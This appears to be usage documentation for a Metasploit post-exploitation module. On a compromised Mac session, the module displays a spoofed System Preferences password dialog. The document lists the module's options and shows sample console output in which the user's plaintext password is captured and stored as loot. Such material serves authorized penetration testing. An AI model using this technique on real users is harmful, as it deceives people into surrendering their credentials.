Presents a password prompt dialog to a logged-in OSX user. Depending on the version of OSX, additional steps may be necessary to allow permission for the prompt to be displayed. See Scenarios for additional details.
- Start msfconsole
- Get a shell, user level is fine.
- Do:
use post/osx/gather/password_prompt_spoof
- Do:
set session #
- Do:
run
- The user will be prompted to enter their password, or complete additional steps.
BUNDLEPATH
Path to bundle containing icon. Default is /System/Library/CoreServices/CoreTypes.bundle
.
ICONFILE
Icon filename relative to bundle. Default is UserUnknownIcon.icns
TEXTCREDS
Text displayed when asking for a password. Default is Type your password to allow System Preferences to make changes
.
TIMEOUT
Timeout for user to enter credentails. Default is 60
. Newer versions of OSX may require additional time due to user interaction.
If the user does not complete the prompt in time, or does not enable permissions to receive the prompt:
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Timeout period expired before credentials were entered!
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti
[*] Post module execution completed
If the user DOES complete the prompt in time:
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Password entered! What a nice compliant user...
[+] password file contents: 20190415_122536:h00die:alfalfasprouts!
[+] Password data stored as loot in: /loot/20190415122537_default_192.168.2.225_password_355107.txt
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.jJATztdro
[*] Post module execution completed
The following screen shots are from OSX 10.14.4 from a ssh_login
shell as the user. Executable may change depending on the shell type and user permissions.
The user is first prompts for additional permissions (System Events):
Next, the user is prompted to allow Accessibility Access (Events):
Clicking Open System Preferences shows the executable asking for the permissions. The screenshot was taken after clicking the lock in the bottom left corner,
and checking sshd-keygen-wrapper
:
Finally, if done within the TIMEOUT
(or with all required permissions):